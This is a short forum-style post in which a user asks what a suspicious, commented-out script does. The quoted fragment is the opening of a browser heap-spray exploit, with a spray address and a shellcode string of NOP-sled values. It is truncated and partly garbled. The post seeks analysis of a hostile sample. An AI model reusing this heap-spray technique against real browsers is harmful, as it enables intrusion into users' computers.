Could someone please give me some idea what this script is doing.

It might be some malicious script that might have been used to spread virus or to hack username/ password, hence it has been ### so that it can't be run by default.

thanks.
Vicky

<!-- <html>
###<body>
###<script>
### var heapSprayToAddr ess = 0x05050505;
### var shellcode = unescape("%u909 0"+"%u9090"+...